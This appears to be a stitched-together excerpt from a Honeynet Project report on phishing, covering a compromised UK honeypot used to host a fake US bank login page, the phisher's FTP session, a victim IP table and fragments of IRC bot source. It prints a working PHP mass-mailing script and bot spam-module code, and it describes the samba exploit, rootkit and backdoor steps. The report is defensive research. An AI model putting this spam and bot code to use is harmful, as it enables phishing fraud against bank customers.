| 1 | 170.154.X |
| 1 | 168.234.X |
| 1 | 168.209.X |
| 1 | 166.114.X |
| 1 | 165.98.X |
| 1 | 165.21.X |
| 1 | 163.23.X |
| 1 | 163.20.X |
| 1 | 162.6.X |
| 1 | 162.39.X |
| 1 | 159.54.X |
| 1 | 158.130.X |
| 1 | 156.110.X |
| 1 | 155.212.X |
| 1 | 151.99.X |
| 1 | 151.195.X |
| 1 | 149.106.X |
| 1 | 148.223.X |
| 1 | 143.248.X |
| 1 | 142.179.X |
| 1 | 141.158.X |
| 1 | 140.131.X |
| 1 | 138.88.X |
| 1 | 137.204.X |
| 1 | 129.44.X |
| 1 | 128.200.X |
| 1 | 12.42.X |
| 1 | 12.176.X |
| 1 | 12.160.X |
| 1 | 12.147.X |
| 1 | 12.101.X |
Details about the UK compromise
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed analysis of the uploaded content only covers the activity relevant to the phishing attack.
The first zip file downloaded was bank.zip, via wget from the Romanian FTP server host2.go.ro.
The file was a valid zip archive, and contained the following data:
This was a pre-prepared web site that mimics the official login page for a major US bank. It included a server side PHP script called check.php, intended to harvest any credentials entered by an unsuspecting end user and email them to the phisher. The presence of a Thumbs.db file suggests that the contents was prepared on a MS Windows system. Scrisoare is the Romanian word for letter, suggesting an email or message or Romanian origin.
Analysis of the check.php script (shown below) reveals that this script is a more advanced version of the script used the German phishing incident. Basic checks on the card number received have been added, along with a refinement that uses the credit card number to classify cards into different types and insert the type into the subject line of the email. This suggests basic scripting abilities and not just a simple script kiddie.
The check.php script:
</html>
";
}
}
}
?>
A hard coded IP address of 66.XXX.XXX.XXX was included in the original script, suggesting that the script had already been used on an alternate server (either another compromised host or a test machine local to the attacker). This IP address appears to be a home DSL IP block belonging to a US carrier and no web site is hosted there now. This script also links directly to the real target bank web site, presumably for added realism and to attempt to confuse recipients.
The second file downloaded using FTP was bank1.tgz:
The file was a valid tgz archive, and contained the following data:
The attacker moved the new files into location in the web root and used the pico editor to change popup.html to point to a test server (http://69.24.XX.XX/testing.php). Again, this was possibly a previously compromised host or a system local to the attacker.
Interestingly, because this FTP session was plain text and the attacker helpfully used the directory listing command, we can observe the attacker�s activities and also see what other tools they have stored in their FTP area. Directory listings are often very useful in providing further background detail during incident analysis:
USER xxxxxxxxx
331 Password required for phiser.
PASS xxxxxxxxx
230 User phisher logged in.
SYST
215 UNIX Type: L8
PASV
227 Entering Passive Mode (81,196,XXX,XXX,99,226).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r-- 1 free web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r-- 1 free web 2788 Jun 16 18:29 bla1.txt
-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web 467214 Jun 10 08:36 eros.tgz
-rw-r--r-- 1 free web 417494 Jul 18 22:27 ex.tgz
-rw-r--r-- 1 free web 2833 Jul 11 16:55 flit.tgz
-rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
-rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
drwxr-xr-x 2 free web 54 Jul 11 04:49 listz
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web 0 Jun 17 10:09 neptun.tgz
-rw-r--r-- 1 free web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r-- 1 free web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
-rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web 574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web 3238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web 64443 Jun 11 02:33 spam
-rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
drwxr-xr-x 2 free web 64 Jul 16 12:05 stuff
-rw-r--r-- 1 free web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
-rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
226 Transfer complete.
CWD banka
250 CWD command successful.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,115,151).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1765 Jul 3 18:25 check.php
-rw-r--r-- 1 free web 39988 Jul 3 18:25 bank.zip
-rw-r--r-- 1 free web 40152 Jul 16 12:26 banka.zip
226 Transfer complete.
CWD ..
250 CWD command successful.
PASV
227 Entering Passive Mode (81,196,XXX,XXX,133,197).
LIST
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r-- 1 free web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r-- 1 free web 2788 Jun 16 18:29 bla1.txt
-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web 467214 Jun 10 08:36 eros.tgz
-rw-r--r-- 1 free web 417494 Jul 18 22:27 ex.tgz
-rw-r--r-- 1 free web 2833 Jul 11 16:55 flit.tgz
-rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
-rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
drwxr-xr-x 2 free web 54 Jul 11 04:49 listz
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web 0 Jun 17 10:09 neptun.tgz
-rw-r--r-- 1 free web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r-- 1 free web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
-rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web 64443 Jun 11 02:33 spam
-rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
drwxr-xr-x 2 free web 64 Jul 16 12:05 stuff
-rw-r--r-- 1 free web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
-rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
226 Transfer complete.
TYPE I
200 Type set to I
PASV
227 Entering Passive Mode (81,196,XXX,XXX,113,86).
RETR bank1.tgz
150 Opening BINARY mode data connection for bank1.tgz (36065 bytes)
226 Transfer complete.
QUIT
221 Goodbye.
The contents of this FTP server home directory suggests that the phisher is heavily involved in spam and phishing activities, with pre-built content and message delivery tools targeting many well known online brands stored on this server. Based on this captured session, this phishing activity is not likely to be an isolated incident.
The third file downloaded was sendbankNEW.tgz from the Romain FTP server host2.go.ro.
The file was a valid archive and contained the following files:
The purpose of each file is listed in the table below:
| File | Contents and purpose |
| ini.inc | Spam sending configuration |
| list.txt | This file contained a list of 5 email addresses to send spam email to. Because of the limited size and Romanian email addresses linked to the attacker, this was presumably the email addresses of fellow gang members and not a real phishing attack |
| bank.php | A simple PHP script to read the contents of a text file (bla.txt) and email it to each recipient in an input file (list.txt) |
The email lure blah.txt was notable for having good grammar and spelling, legalise at the bottom about "Equal Opportunity Lending" and heavy use of files linked directly from the official web site of the targeted bank, all of which help it to appear more realistic. One ironic point to note is that the email even included an exhortation to not provide passwords to fraudulent web sites, or to ever email your password to a third party!
The bank.php mass emailing script to send spam advertising this particular phishing scam is shown below:
XXXXXXXXX<restore@targetbank.com>\n";
$mail_header .= "Content-Type: text/html\n";
$subject="In attention of Target Bank Members ! Restore Your Account Now!";
$body=loadini("bla.txt");
if (!($fp = fopen("list.txt", "r")))
exit("Unable to
open $listFile.");
$i=0;
print "Start time is "; print date("Y:m:d H:i"); print
"\n";
while (!feof($fp)) {
fscanf($fp, "%s", $name);
$i++;
mail($name, $subject, $body, $mail_header);
}
print "End time is "; print date("Y:m:d
H:i"); print "\n";
print "$i"; print "emails sent."; print"\n";
?>
Although simple, it is functional and could easily have been used to send many more messages than the 5 test messages sent from the honeynet. The honeynet architecture would have restricted outbound emails, but the honeypot was taken offline for forensic analysis before any bulk spam email could be sent by the attacker.
This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed timeline only covers the activity relevant to the phishing attack.
Detailed timeline:
18/07/04 - 12:30. First the attacker exploits a buffer overflow in the samba server on the Redhat Linux 7.3 honeypot, as can be seen from the snort alerts shown below:
[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AC788 Ack: 0x2E249707 Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref => <a href="http://www.whitehats.com/info/IDS181">http://www.whitehats.com/info/IDS181</a>]
18/07/04 - 12:30. After a few retries with different offsets, the samba exploit (CAN-2003-0201) succeeds and returns a root prompt to the attacker, as show by the snort alert below:
***AP*** Seq: 0x2E1F5FBE Ack: 0x47D426D5 Win: 0x16A0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 6064395 214022589
18/07/04 - 12:30. After gaining root access, the attacker check who they are and who else is logged into the system before attempting to hide their activities by turning off shell history logging. The Sebek keystrokes for this session are shown below:
18/07/04 - 12:31. The attacker then proceeds to downloading what appears to be an image file from a remote web server using the wget command line HTTP client:
18/07/04 - 12:32. The attacker unpacks the image file, which is actually a gziped tar archive, before extracting and running a setup program:
The attackers view of this session can be found here. Analysis showed that the malware installed was the SHV4 root kit, previously the subject of the Honeynet Projects Scan of the Month challenge 29.
From the SHV4 root kit source code, we can determine what the setup command does:
The attacker has installed and configured an encrypted backdoor on the honeypot, bound to TCP port 2277. A large amount of other activity occurs on the system over the next few 12-72 hours, including installation of PsyBNC IRC servers by a Romanian group, installation and usage of the mole and mazz mass scanners (probably the autorooter used to compromise this honeypot), installation and re-installation of other rootkits, password sniffing and various other activities not relevant to the main phishing attack.
23/07/04 - 21:11. The attacker returns from 192.226.XXX.XXX (a Windows 2000 or Windows XP PC in Ontario) via the SSH backdoor listening on TCP port 2277 and checks if the server is still active and who is logged in:
23/07/04 - 21:13. The attacker reconnects, prepares a directory in the Apache web server's document root and then downloads some pre-built web content from a Romanian web server using, again using wget, before checking the honeypot's IP address and PHP configuration:
23/07/04 - 21:15. The attacker attempts to extract the contents of the zip file but finds it is corrupt and deletes it.
23/07/04 - 21:16. The attacker changes tools and gets another file using FTP, again from the same web server in Romania, which does extract successfully this time:
23/07/04 - 21:17. The attacker edits the extracted web content and updates the HTML to point to a testing PHP script on a remote web server:
23/07/04 - 21:22. The attacker checks the network configuration of the honeypot and version of PHP installed:
25/07/04 - 21:42. The attacker opens a second session, checks again if PHP is configured correctly on the honeypot and downloads a tool for sending spam email from the same Romanian web server:
25/07/04 - 22:08. The attacker checks an input list email addresses and runs a PHP script to send spam email:
25/07/04 - 22:10. The attacker edits the content of the spam message, points it a co-located Linux web server running an American student web site, and runs the PHP script to send spam email again:
The attackers initial test at 22:08:52 works as planned, with 5 test messages being successfully sent (although due to the outbound traffic restrictions on the Honeywall, further mass mailing attempts would fail). However, after 10 minutes wait the attacker cleans up and leaves without sending any further messages from this honeypot.
In this side note we provide an overview of the source IP addresses of potential victims in the UK phishing attack against a major US bank described in phishing technique one. The data below was collected with the help of the compromised UK honeypot and network packet captures. Over a period of about 4 days we observed 265 inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All were potential victims of the phishing attack, but none actually submitted personal data and therefore the phishing attack was unsucessful.
| IP | ISP | Country | OS |
| 4.138.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ (NAT!) |
| 4.224.NNN.NNN | Level 3 | US | Windows 98 |
| 4.235.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ (NAT!) |
| 4.239.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ |
| 12.202.NNN.NNN | AT&T; | US | FreeBSD 4.7 |
| 12.217.NNN.NNN | AT&T; | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 12.218.NNN.NNN | AT&T; | US | UNKNOWN |
| 24.16.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 |
| 24.58.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.59.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.62.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.90.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.93.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.107.NNN.NNN | Charter Comms | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.129.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 24.140.NNN.NNN | Massillon Cable | US | Windows XP, 2000 SP2+ |
| 24.154.NNN.NNN | Armstrong Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.160.NNN.NNN | Road Runner | US | UNKNOWN |
| 24.161.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.162.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.163.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 24.165.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.166.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.208.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.209.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 (firewall!) |
| 24.220.NNN.NNN | Midcontinent Comms | US | UNKNOWN |
| 24.231.NNN.NNN | Charter Comms | US | Windows XP SP1, 2000 SP3 |
| 24.239.NNN.NNN | Armstrong Cable | US | Windows XP/2000 |
| 24.243.NNN.NNN | Service Co LLC | US | Windows XP Pro SP1, 2000 SP3 |
| 63.165.NNN.NNN | DIGITEL | Prob US | OpenBSD 3.0 |
| 63.192.NNN.NNN | Pacific Bell | US | Windows 2000 SP4, XP SP1 |
| 64.12.NNN.NNN | AOL | US | Linux 2.4 w/o timestamps |
| 64.33.NNN.NNN | West Winconsin Telecomn | US | Windows XP, 2000 SP2+ |
| 64.58.NNN.NNN | Marlowe & Associates | US | Windows 98 (2) (NAT!) |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.161.NNN.NNN | Pacific Bell Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 64.216.NNN.NNN | SBC Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 64.222.NNN.NNN | Verizon Internet | US | Windows 2000 SP4, XP SP 1 |
| 65.78.NNN.NNN | RCN Corporation | US | FreeBSD 4.7 |
| 65.166.NNN.NNN | Sprint | US | Windows 98 |
| 65.204.NNN.NNN | Eagle Mountain Telecom | US | FreeBSD 4.8 |
| 65.221.NNN.NNN | Buckeye Cablevision | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 65.229.NNN.NNN | UUNET | US | Windows XP/2000 |
| 66.38.NNN.NNN | Brandenburg Telephone Company | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.41.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.45.NNN.NNN | WholeSecurity, Inc | US | Windows 2000 SP4, XP SP1 |
| 66.61.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 66.67.NNN.NNN | Road Runnner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.68.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 66.82.NNN.NNN | Hughes Network Systems | US | UNKNOWN |
| 66.170.NNN.NNN | T-NET, Inc | US | Windows XP, 2000 SP2+ |
| 66.188.NNN.NNN | Charter Comms | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) (firewall!) |
| 67.5.NNN.NNN | Qwest | US | Windows XP, 2000 SP2+ |
| 67.23.NNN.NNN | Adelphia Cable Comms | US | Windows XP Pro SP1, 2000 SP3 |
| 67.38.NNN.NNN | Ameritech Electronic Commerce | US | Windows XP, 2000 SP2+ |
| 67.66.NNN.NNN | SBC Internet Services | US | Windows XP SP1, 2000 SP3 |
| 67.122.NNN.NNN | Pac Bell Internet | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 67.160.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 67.164.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 67.167.NNN.NNN | Comcast Cable | US | UNKNOWN |
| 68.10.NNN.NNN | Cox Communications Inc | US | Windows XP Pro SP1, 2000 SP3 |
| 68.14.NNN.NNN | Cox Communications Inc | US | FreeBSD 4.7 |
| 68.32.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 68.53.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 |
| 68.88.NNN.NNN | SBC Internet Services | US | Windows 2000 SP4, XP SP 1 |
| 68.89.NNN.NNN | SBC Internet Services | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 68.94.NNN.NNN | SBC Internet Services | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 68.103.NNN.NNN | Cox Communications Inc | US | Windows XP Pro SP1, 2000 SP3 |
| 68.109.NNN.NNN | Cox Communications Inc | US | Windows 2000 SP4, XP SP1 |
| 68.205.NNN.NNN | Road Runner | US | UNKNOWN |
| 68.254.NNN.NNN | SBC Internet Services | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.23.NNN.NNN | - | - | Windows XP Pro SP1, 2000 SP3 |
| 69.48.NNN.NNN | Choice One Comms | US | Windows XP, 2000 SP2+ |
| 69.59.NNN.NNN | Peak Inc | US | Windows XP/2000 via Cisco |
| 69.132.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.133.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 69.134.NNN.NNN | Road Runner | US | UNKNOWN |
| 69.135.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 69.135.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.151.NNN.NNN | SBC Internet Services | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 69.162.NNN.NNN | Adelphia Cable Comms | US | FreeBSD 4.7 |
| 137.229.NNN.NNN | University of Alaska | US | Windows XP Pro SP1, 2000 SP3 |
| 141.154.NNN.NNN | Verizon Internet | US | Windows XP SP1, 2000 SP3 |
| 148.78.NNN.NNN | Starband Comms | US | CacheFlow CacheOS 4.1 (up |
| 149.174.NNN.NNN | CompuServe | US | Linux 2.4 w/o timestamps |
| 152.163.NNN.NNN | AOL | US | Linux 2.4 w/o timestamps |
| 156.36.NNN.NNN | US Bancorp | US | OpenBSD 3.0 |
| 162.83.NNN.NNN | Verizon Internet | US | Windows 2000 SP4, XP SP1 |
| 166.102.NNN.NNN | WRK Internet | - | Windows XP, 2000 SP2+ |
| 166.102.NNN.NNN | WRK Internet | - | Windows XP, 2000 SP2+ |
| 169.207.NNN.NNN | Executive PC, Inc | US | Windows 98 |
| 170.94.NNN.NNN | State of Arkansas | US | Windows 2000 SP4, XP SP1 |
| 172.131.NNN.NNN | AOL | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 172.131.NNN.NNN | AOL | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 204.95.NNN.NNN | Sprint | US | Windows XP, 2000 SP2+ |
| 204.210.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 204.210.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 205.162.NNN.NNN | Buckeye Cablevision | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 206.148.NNN.NNN | AGIS | US | Windows XP, 2000 SP2+ |
| 206.196.NNN.NNN | US West Internet Services | US | Windows XP Pro SP1, 2000 SP3 |
| 207.89.NNN.NNN | NetLink Systems LLC | US | Windows XP, 2000 SP2+ |
| 207.89.NNN.NNN | NetLink Systems LLC | US | Linux 2.4/2.6 (up |
| 207.231.NNN.NNN | Surewest Internet | US | BSD/OS 3.1 |
| 208.60.NNN.NNN | Local Link | US | Windows XP, 2000 SP2+ |
| 208.187.NNN.NNN | Lanset Comms | US | Windows XP, 2000 SP2+ |
| 208.191.NNN.NNN | SBC Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 209.43.NNN.NNN | IQuest Internet | US | Windows XP, 2000 SP2+ |
| 209.131.NNN.NNN | CenturyTel Internet Holdings Inc | US | Windows 98 |
| 209.206.NNN.NNN | IQuest Internet | US | Windows XP, 2000 SP2+ |
| 209.247.NNN.NNN | Bend Cable | US | Linux 2.4/2.6 (up |
| 216.93.NNN.NNN | Voyager Information Networks | US | Windows XP, 2000 SP2+ |
| 216.228.NNN.NNN | Bend Cable | US | Cisco Content Engine |
In this side note will will review the source code of some bots captured during our research and show several examples of how bots are being used to send out spam and phishing emails.
strcpy(server,a[s+1]);
port = atoi(a[s+2]);
strcpy(sender_email,a[s+3]);
strcpy(recp_email,a[s+4]);
strcpy(subject,replacestr(a[s+5],"_"," "));
fWSAStartup(version, &wsaData;);
LPHOSTENT lpHostEntry;
lpHostEntry = fgethostbyname(server);
SOCKET MailSocket;
MailSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = fhtons((unsigned short)port);
sprintf(BigBuf,"helo $rndnick\nmail from: <%s>\nrcpt to: <%s>\ndata\nsubject:
%s\nfrom: %s\n%s\n.\n",sender_email,recp_email,subject,sender_email,subject);
nRet = fconnect(MailSocket, (LPSOCKADDR)&saServer;, sizeof(saServer));
nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0);
nRet = fsend(MailSocket, BigBuf, strlen(myBuf), 0);
nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0);
fclosesocket(MailSocket);
fWSACleanup();
sprintf(sendbuf, "[EMAIL]: Message sent to %s.",recp_email);
if (!silent) irc_privmsg(sock, a[2], sendbuf, notice);
addlog(sendbuf);
return repeat;
}
[...]
int sAOLSock=DoTcpConnect(szDNS, 25); if(sAOLSock==SOCKET_ERROR) return false;
int iCount=0; char szBuf[4096]; while(recv_line(sAOLSock, szBuf, sizeof(szBuf))) {
if(strstr(szBuf, "220-") && strstr(szBuf, "ESMTP")) break;
if(strstr(szBuf, "postmaster.info.aol.com")) iIsMsg_Matched+=25;
if(strstr(szBuf, "554-") && iCount==1) iIsMsg_Matched+=20;
if(strstr(szBuf, "(RTR:DU)")) iIsMsg_Matched+=10;
if(strstr(szBuf, "not accept")) iIsMsg_Matched+=10;
if(strstr(szBuf, "dynamic")) iIsMsg_Matched+=5;
if(strstr(szBuf, "residential")) iIsMsg_Matched+=5;
if(strstr(szBuf, "are using to")) iIsMsg_Matched+=5;
iCount++; }
if(iCount==5) iIsMsg_Matched+=10;
xWrite(sAOLSock, "QUIT\n", sizeof("QUIT\n"));
bool bRetVal=false;
if(iIsMsg_Matched <= 5) bRetVal=true;
xClose(sAOLSock);
return bRetVal;
}
This is private software, you may redistribute it under the terms of
the APL(Ago's Private License) which follows:
Redistribution and use in binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
2. The binary may not be sold and/or given away for free.
3. The licensee may only create binaries for his own usage, not for any
third parties.
Redistribution and use in source forms, with or without modification,
are not permitted.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
#include "main.h"
#include "mainctrl.h"
#include "smtp_logic.h"
#include "smtp.h"
CSMTP_Logic::CSMTP_Logic() {
m_szType="CSMTP_Logic";
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
CSMTP_Logic::~CSMTP_Logic() {
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
void CSMTP_Logic::Init() {
REGCMD(m_cmdSetList, "spam.setlist", "downloads an email list", false, this);
REGCMD(m_cmdSetTemplate, "spam.settemplate", "downloads an email template", false, this);
REGCMD(m_cmdStart, "spam.start", "starts the spamming", false, this);
REGCMD(m_cmdStop, "spam.stop", "stops the spamming", false, this);
REGCVAR(spam_maxthreads, "8", "Spam Logic - Number of threads", false, 0);
REGCVAR(spam_htmlemail, "true", "Spam Logic - Send HTML emails", false, 0);
}
bool CSMTP_Logic::HandleCommand(CMessage *pMsg) {
if(!pMsg->sCmd.Compare("spam.setlist")) {
m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email list.", pMsg->sReplyTo.Str());
SetList(m_sListURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email list.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.settemplate")) {
m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email template.", pMsg->sReplyTo.Str());
SetTemplate(m_sTemplateURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email template.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.start")) {
m_bSpamming=true;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Started spamming.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.stop")) {
m_bSpamming=false;
